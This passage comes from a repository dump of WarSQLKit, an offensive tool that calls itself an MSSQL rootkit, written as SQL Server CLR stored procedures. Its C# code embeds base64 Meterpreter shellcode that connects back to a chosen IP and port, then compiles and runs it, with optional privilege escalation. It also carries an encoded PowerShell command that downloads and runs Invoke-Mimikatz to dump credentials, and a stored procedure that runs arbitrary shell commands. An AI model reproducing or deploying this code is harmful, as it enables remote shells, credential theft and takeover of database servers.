void RunMeterpreter(string ip, string port)" + 340 | "{" + 341 | "try" + 342 | "{" + 343 | "var ipOctetSplit = ip.Split('.');" + 344 | "byte octByte1 = Convert.ToByte(ipOctetSplit[0]);" + 345 | "byte octByte2 = Convert.ToByte(ipOctetSplit[1]);" + 346 | "byte octByte3 = Convert.ToByte(ipOctetSplit[2]);" + 347 | "byte octByte4 = Convert.ToByte(ipOctetSplit[3]);" + 348 | 349 | "int inputPort = Int32.Parse(port);" + 350 | "byte port1Byte = 0x00;" + 351 | "byte port2Byte = 0x00;" + 352 | "byte[] shellCodePacket = new byte[15];" + 353 | "shellCodePacket[0] = 0x6a;" + 354 | "shellCodePacket[1] = 0x05;" + 355 | "shellCodePacket[2] = 0x68;" + 356 | "shellCodePacket[3] = octByte1;" + 357 | "shellCodePacket[4] = octByte2;" + 358 | "shellCodePacket[5] = octByte3;" + 359 | "shellCodePacket[6] = octByte4;" + 360 | "shellCodePacket[7] = 0x68;" + 361 | "shellCodePacket[8] = 0x02;" + 362 | "shellCodePacket[9] = 0x00;" + 363 | "if (inputPort > 256)" + 364 | "{" + 365 | "int portOct1 = inputPort / 256;" + 366 | "int portOct2 = portOct1 * 256;" + 367 | "int portOct3 = inputPort - portOct2;" + 368 | "int portoct1Calc = portOct1 * 256 + portOct3;" + 369 | "if (inputPort == portoct1Calc)" + 370 | "{" + 371 | "port1Byte = Convert.ToByte(portOct1);" + 372 | "port2Byte = Convert.ToByte(portOct3);" + 373 | "shellCodePacket[10] = port1Byte;" + 374 | "shellCodePacket[11] = port2Byte;" + 375 | "}" + 376 | "}" + 377 | "else" + 378 | "{" + 379 | "shellCodePacket[10] = port1Byte;" + 380 | "shellCodePacket[11] = Convert.ToByte(inputPort);" + 381 | "}" + 382 | "shellCodePacket[12] = 0x89;" + 383 | "shellCodePacket[13] = 0xe6;" + 384 | "shellCodePacket[14] = 0x50;" + 385 | 386 | "string shellCodeRaw = \"/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYH/9W4kAEAACnEVFBoKYBrAP/VagVowKiLhmgCABFcieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04Idezo1gAAAGoAagRWV2gC2chf/9WD+AB+SYs2gfbrYEhjjY4AAQAAakBoABAAAFFqAGhYpFPl/9WNmAABAABTVlBqAFZTV2gC2chf/9WD+AB9IlhoAEAAAGoAUGgLLw8w/9VXaHVuTWH/1V5e/wwk6V7///8BwynGdcdbWV1VV4nf6BAAAADdV2PPqbQaL1HF9q6xpi5lXjHAqv7AdfuB7wABAAAx2wIcB4nCgOIPAhwWihQHhhQfiBQH/sB16DHb/sACHAeKFAeGFB+IFAcCFB+KFBcwVQBFSXXlX8M=\";" + 387 | 388 | "string s3 = Convert.ToBase64String(shellCodePacket);" + 389 | "string newShellCode = shellCodeRaw.Replace(\"agVowKiLhmgCABFcieZQ\", s3);" + 390 | "byte[] shellCodeBase64 = Convert.FromBase64String(newShellCode);" + 391 | "UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellCodeBase64.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" + 392 | "Marshal.Copy(shellCodeBase64, 0, (IntPtr)(funcAddr), shellCodeBase64.Length);" + 393 | "IntPtr hThread = IntPtr.Zero;" + 394 | "UInt32 threadId = 0;" + 395 | "IntPtr pinfo = IntPtr.Zero;" + 396 | "hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);" + 397 | "WaitForSingleObject(hThread, 0xFFFFFFFF);" + 398 | "return;" + 399 | "}" + 400 | "catch (Exception e)" + 401 | "{" + 402 | "Console.WriteLine(e);" + 403 | "throw;" + 404 | "}" + 405 | "}" + 406 | 407 | "private static UInt32 MEM_COMMIT = 0x1000;" + 408 | "private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;" + 409 | "[DllImport(\"kernel32\")]" + 410 | "private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);" + 411 | "[DllImport(\"kernel32\")]" + 412 | "private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);" + 413 | "[DllImport(\"kernel32\")]" + 414 | "private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);" + 415 | 416 | "}" + 417 | "}"; 418 | NetFrameWorkDirectory(); 419 | File.WriteAllText(@"C:\\ProgramData\\" + randomFileName + @"_rc4.cs", strMtr); 420 | SqlContext.Pipe.Send("Meterpreter C# File created."); 421 | SqlContext.Pipe.Send("CSharp Compiler is running."); 422 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\Windows\Microsoft.NET\Framework\"+ _netFrameworkList[_netFrameworkList.Count - 1] + @"\csc.exe /unsafe /platform:x86 /out:C:\ProgramData\" + randomFileName + @"_rc4.exe " + @"C:\ProgramData\" + randomFileName + @"_rc4.cs"); 423 | SqlContext.Pipe.Send("Meterpreter compiled."); 424 | File.Delete(@"C:\ProgramData\" + randomFileName + @"_rc4.cs"); 425 | if (IsRunSystemPriv == true) 426 | { 427 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\\ProgramData\\Kumpir.exe C:\ProgramData\" + randomFileName + @"_rc4.exe"); 428 | } 429 | else 430 | { 431 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\ProgramData\" + randomFileName + @"_rc4.exe"); 432 | } 433 | } 434 | public void SaveMimikatz() 435 | { 436 | SqlContext.Pipe.Send("Mimikatz C# File is being created."); 437 | var strMtr = "using System;" + 438 | "using System.Diagnostics;" + 439 | "using System.Text;" + 440 | "namespace Meterpreter_Test3" + 441 | "{" + 442 | "class Program" + 443 | "{" + 444 | "static void Main(string[] args)" + 445 | "{" + 446 | "RunMimikatz(\"cmd.exe\", \"/c powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA== > C:\\\\ProgramData\\\\mimi.log 2>&1\");" + 447 | "}" + 448 | "public static void RunMimikatz(string filename, string arguments)" + 449 | "{" + 450 | "var process = new Process();" + 451 | "process.StartInfo.FileName = filename;" + 452 | "if (!string.IsNullOrEmpty(arguments))" + 453 | "{" + 454 | "process.StartInfo.Arguments = arguments;" + 455 | "}" + 456 | "process.StartInfo.CreateNoWindow = true;" + 457 | "process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;" + 458 | "process.StartInfo.UseShellExecute = false;" + 459 | "process.StartInfo.RedirectStandardError = true;" + 460 | "process.StartInfo.RedirectStandardOutput = true;" + 461 | "var stdOutput = new StringBuilder();" + 462 | "process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data);" + 463 | "string stdError = null;" + 464 | "try" + 465 | "{" + 466 | "process.Start();" + 467 | "process.BeginOutputReadLine();" + 468 | "stdError = process.StandardError.ReadToEnd();" + 469 | "process.WaitForExit();" + 470 | "}" + 471 | "catch (Exception e)" + 472 | "{" + 473 | "}" + 474 | "if (process.ExitCode == 0)" + 475 | "{" + 476 | "}" + 477 | "else" + 478 | "{" + 479 | "var message = new StringBuilder();" + 480 | "if (!string.IsNullOrEmpty(stdError))" + 481 | "{" + 482 | "message.AppendLine(stdError);" + 483 | "}" + 484 | "if (stdOutput.Length != 0)" + 485 | "{" + 486 | "message.AppendLine(\"Std output:\");" + 487 | "message.AppendLine(stdOutput.ToString());" + 488 | "}" + 489 | "}" + 490 | "}" + 491 | "}" + 492 | "}"; 493 | x64NetFrameWorkDirectory(); 494 | File.WriteAllText(@"C:\ProgramData\mimiPs.cs", strMtr); 495 | SqlContext.Pipe.Send("Mimikatz C# File created."); 496 | SqlContext.Pipe.Send("CSharp Compiler is running."); 497 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\Windows\Microsoft.NET\Framework64\"+ _x64NetFrameworkList[_x64NetFrameworkList.Count - 1] + @"\csc.exe /unsafe /platform:x64 /out:C:\ProgramData\MimiPs.exe " + @"C:\ProgramData\mimiPs.cs"); 498 | SqlContext.Pipe.Send("Mimikazt compiled."); 499 | File.Delete(@"C:\ProgramData\mimiPs.cs"); 500 | } 501 | public static void NetFrameWorkDirectory() 502 | { 503 | _netFrameworkList.Clear(); 504 | string targetDirectory = @"C:\Windows\Microsoft.NET\Framework"; 505 | string[] subdirectoryEntries = Directory.GetDirectories(targetDirectory); 506 | for (int i = 0; i < subdirectoryEntries.Length; i++) 507 | { 508 | string[] versionStrings = subdirectoryEntries[i].Split('\\'); 509 | if (versionStrings[(versionStrings.Length - 1)].StartsWith("v")) 510 | { 511 | if (versionStrings[(versionStrings.Length - 1)].StartsWith("VJ")) 512 | return; 513 | _netFrameworkList.Add(versionStrings[(versionStrings.Length - 1)]); 514 | } 515 | } 516 | } 517 | public static void x64NetFrameWorkDirectory() 518 | { 519 | _x64NetFrameworkList.Clear(); 520 | string targetDirectory = @"C:\Windows\Microsoft.NET\Framework64"; 521 | string[] subdirectoryEntries = Directory.GetDirectories(targetDirectory); 522 | for (int i = 0; i < subdirectoryEntries.Length; i++) 523 | { 524 | string[] versionStrings = subdirectoryEntries[i].Split('\\'); 525 | if (versionStrings[(versionStrings.Length - 1)].StartsWith("v")) 526 | { 527 | if (versionStrings[(versionStrings.Length - 1)].StartsWith("VJ")) 528 | return; 529 | _x64NetFrameworkList.Add(versionStrings[(versionStrings.Length - 1)]); 530 | } 531 | } 532 | } 533 | public void BuildRunMeterpreter(string filename, string arguments) 534 | { 535 | var process = new Process(); 536 | 537 | process.StartInfo.FileName = filename; 538 | if (!string.IsNullOrEmpty(arguments)) 539 | { 540 | process.StartInfo.Arguments = arguments; 541 | } 542 | 543 | process.StartInfo.CreateNoWindow = true; 544 | process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; 545 | process.StartInfo.UseShellExecute = false; 546 | 547 | process.StartInfo.RedirectStandardError = true; 548 | process.StartInfo.RedirectStandardOutput = true; 549 | var stdOutput = new StringBuilder(); 550 | process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data); 551 | string stdError = null; 552 | try 553 | { 554 | process.Start(); 555 | process.BeginOutputReadLine(); 556 | stdError = process.StandardError.ReadToEnd(); 557 | process.WaitForExit(); 558 | } 559 | catch (Exception e) 560 | { 561 | SqlContext.Pipe.Send(e.Message); 562 | } 563 | 564 | if (process.ExitCode == 0) 565 | { 566 | //SqlContext.Pipe.Send(stdOutput.ToString()); 567 | } 568 | else 569 | { 570 | var message = new StringBuilder(); 571 | 572 | if (!string.IsNullOrEmpty(stdError)) 573 | { 574 | message.AppendLine(stdError); 575 | } 576 | 577 | if (stdOutput.Length != 0) 578 | { 579 | message.AppendLine("Std output:"); 580 | message.AppendLine(stdOutput.ToString()); 581 | } 582 | } 583 | } 584 | public static string RandomFileName(int start, int end) 585 | { 586 | var rnd = new Random(); 587 | var chr = "0123456789ABCDEFGHIJKLMNOPRSTUVWXYZ".ToCharArray(); 588 | var randomFName = string.Empty; 589 | for (var i = start; i < end; i++) 590 | { 591 | randomFName += chr[rnd.Next(0, chr.Length - 1)].ToString(); 592 | } 593 | return randomFName; 594 | } 595 | } 596 | } 597 | -------------------------------------------------------------------------------- /WarSQLKit/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | 3 | // General Information about an assembly is controlled through the following 4 | // set of attributes. Change these attribute values to modify the information 5 | // associated with the SQLCLR assembly. 6 | [assembly: AssemblyTitle("WarSQLKit")] 7 | [assembly: AssemblyDescription("")] 8 | [assembly: AssemblyConfiguration("")] 9 | [assembly: AssemblyCompany("MSSQL Rootkit")] 10 | [assembly: AssemblyProduct("Eyup CELIK")] 11 | [assembly: AssemblyCopyright("http://eyupcelik.com.tr")] 12 | [assembly: AssemblyTrademark("")] 13 | [assembly: AssemblyCulture("")] 14 | 15 | // Version information for an assembly consists of the following four values: 16 | // 17 | // Major Version 18 | // Minor Version 19 | // Build Number 20 | // Revision 21 | // 22 | [assembly: AssemblyVersion("1.0.0.0")] 23 | [assembly: AssemblyFileVersion("1.0.0.0")] 24 | -------------------------------------------------------------------------------- /WarSQLKit/StoredProcedures.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKit/StoredProcedures.cs -------------------------------------------------------------------------------- /WarSQLKit/WarSQLKit.sqlproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | WarSQLKit 8 | 2.0 9 | 4.1 10 | {c6001c77-007a-4851-9371-61828d235c4e} 11 | Microsoft.Data.Tools.Schema.Sql.Sql130DatabaseSchemaProvider 12 | Database 13 | 14 | 15 | WarSQLKit 16 | WarSQLKit 17 | 1033, CI 18 | BySchemaAndSchemaType 19 | True 20 | v4.0 21 | CS 22 | Properties 23 | False 24 | True 25 | True 26 | 27 | 28 | bin\Release\ 29 | $(MSBuildProjectName).sql 30 | False 31 | pdbonly 32 | true 33 | false 34 | true 35 | prompt 36 | 4 37 | 38 | 39 | bin\Debug\ 40 | $(MSBuildProjectName).sql 41 | false 42 | true 43 | full 44 | false 45 | true 46 | true 47 | prompt 48 | 4 49 | 50 | 51 | 11.0 52 | 53 | True 54 | 11.0 55 | 56 | 57 | bin\Release\ 58 | $(MSBuildProjectName).sql 59 | False 60 | pdbonly 61 | true 62 | false 63 | true 64 | prompt 65 | 4 66 | x64 67 | 68 | 69 | bin\Debug\ 70 | $(MSBuildProjectName).sql 71 | false 72 | true 73 | full 74 | false 75 | true 76 | true 77 | prompt 78 | 4 79 | x64 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | -------------------------------------------------------------------------------- /WarSQLKit/WarSQLKit.sqlproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- /WarSQLKit/bin/Debug/Confused/WarSQLKit.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKit/bin/Debug/Confused/WarSQLKit.dll -------------------------------------------------------------------------------- /WarSQLKit/bin/Debug/WarSQLKit.dacpac: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKit/bin/Debug/WarSQLKit.dacpac -------------------------------------------------------------------------------- /WarSQLKit/bin/Debug/WarSQLKit.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKit/bin/Debug/WarSQLKit.dll -------------------------------------------------------------------------------- /WarSQLKit/bin/Debug/WarSQLKit.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKit/bin/Debug/WarSQLKit.pdb -------------------------------------------------------------------------------- /WarSQLKitMinimal/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | 3 | // General Information about an assembly is controlled through the following 4 | // set of attributes. Change these attribute values to modify the information 5 | // associated with the SQLCLR assembly. 6 | [assembly: AssemblyTitle("WarSQLKitMinimal")] 7 | [assembly: AssemblyDescription("")] 8 | [assembly: AssemblyConfiguration("")] 9 | [assembly: AssemblyCompany("")] 10 | [assembly: AssemblyProduct("Eyup CELIK")] 11 | [assembly: AssemblyCopyright("http://eyupcelik.com.tr")] 12 | [assembly: AssemblyTrademark("")] 13 | [assembly: AssemblyCulture("")] 14 | 15 | // Version information for an assembly consists of the following four values: 16 | // 17 | // Major Version 18 | // Minor Version 19 | // Build Number 20 | // Revision 21 | // 22 | [assembly: AssemblyVersion("1.0.0.0")] 23 | [assembly: AssemblyFileVersion("1.0.0.0")] 24 | -------------------------------------------------------------------------------- /WarSQLKitMinimal/StoredProcedure.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Data; 3 | using System.Data.SqlClient; 4 | using System.Data.SqlTypes; 5 | using System.Diagnostics; 6 | using System.IO; 7 | using System.Text; 8 | using Microsoft.SqlServer.Server; 9 | 10 | public partial class StoredProcedures 11 | { 12 | [Microsoft.SqlServer.Server.SqlProcedure] 13 | public static void CmdExec(string cmd) 14 | { 15 | SqlContext.Pipe.Send("Command is running, please wait."); 16 | SqlContext.Pipe.Send(RunCommand("cmd.exe", " /c " + cmd)); 17 | } 18 | public static string RunCommand(string filename, string arguments) 19 | { 20 | var process = new Process(); 21 | 22 | process.StartInfo.FileName = filename; 23 | if (!string.IsNullOrEmpty(arguments)) 24 | { 25 | process.StartInfo.Arguments = arguments; 26 | } 27 | 28 | process.StartInfo.CreateNoWindow = true; 29 | process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; 30 | process.StartInfo.UseShellExecute = false; 31 | 32 | process.StartInfo.RedirectStandardError = true; 33 | process.StartInfo.RedirectStandardOutput = true; 34 | var stdOutput = new StringBuilder(); 35 | process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data); 36 | string stdError = null; 37 | try 38 | { 39 | process.Start(); 40 | process.BeginOutputReadLine(); 41 | stdError = process.StandardError.ReadToEnd(); 42 | process.WaitForExit(); 43 | } 44 | catch (Exception e) 45 | { 46 | SqlContext.Pipe.Send("OS error while executing " + filename + arguments + ": " + e.Message); 47 | } 48 | 49 | if (process.ExitCode == 0) 50 | { 51 | SqlContext.Pipe.Send(stdOutput.ToString()); 52 | } 53 | else 54 | { 55 | var message = new StringBuilder(); 56 | 57 | if (!string.IsNullOrEmpty(stdError)) 58 | { 59 | message.AppendLine(stdError); 60 | } 61 | 62 | if (stdOutput.Length != 0) 63 | { 64 | message.AppendLine("Std output:"); 65 | message.AppendLine(stdOutput.ToString()); 66 | } 67 | SqlContext.Pipe.Send(filename + arguments + " finished with exit code = " + process.ExitCode + ": " + message); 68 | } 69 | return stdOutput.ToString(); 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /WarSQLKitMinimal/WarSQLKitMinimal.sqlproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | WarSQLKitMinimal 8 | 2.0 9 | 4.1 10 | {b4e1bee9-3454-4d2f-a6d7-e47fd5b602b8} 11 | Microsoft.Data.Tools.Schema.Sql.Sql130DatabaseSchemaProvider 12 | Database 13 | 14 | 15 | WarSQLKitMinimal 16 | WarSQLKitMinimal 17 | 1033, CI 18 | BySchemaAndSchemaType 19 | True 20 | v4.0 21 | CS 22 | Properties 23 | False 24 | True 25 | True 26 | 27 | 28 | bin\Release\ 29 | $(MSBuildProjectName).sql 30 | False 31 | pdbonly 32 | true 33 | false 34 | true 35 | prompt 36 | 4 37 | 38 | 39 | bin\Debug\ 40 | $(MSBuildProjectName).sql 41 | false 42 | true 43 | full 44 | false 45 | true 46 | true 47 | prompt 48 | 4 49 | 50 | 51 | 11.0 52 | 53 | True 54 | 11.0 55 | 56 | 57 | bin\Release\ 58 | $(MSBuildProjectName).sql 59 | False 60 | pdbonly 61 | true 62 | false 63 | true 64 | prompt 65 | 4 66 | x64 67 | 68 | 69 | bin\Debug\ 70 | $(MSBuildProjectName).sql 71 | false 72 | true 73 | full 74 | false 75 | true 76 | true 77 | prompt 78 | 4 79 | x64 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | -------------------------------------------------------------------------------- /WarSQLKitMinimal/WarSQLKitMinimal.sqlproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- /WarSQLKitMinimal/bin/Debug/WarSQLKitMinimal.dacpac: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKitMinimal/bin/Debug/WarSQLKitMinimal.dacpac -------------------------------------------------------------------------------- /WarSQLKitMinimal/bin/Debug/WarSQLKitMinimal.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKitMinimal/bin/Debug/WarSQLKitMinimal.dll -------------------------------------------------------------------------------- /WarSQLKitMinimal/bin/Debug/WarSQLKitMinimal.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit/b15d4eb1236f6f5053fcb009afb4fb3ab99ab749/WarSQLKitMinimal/bin/Debug/WarSQLKitMinimal.pdb --------------------------------------------------------------------------------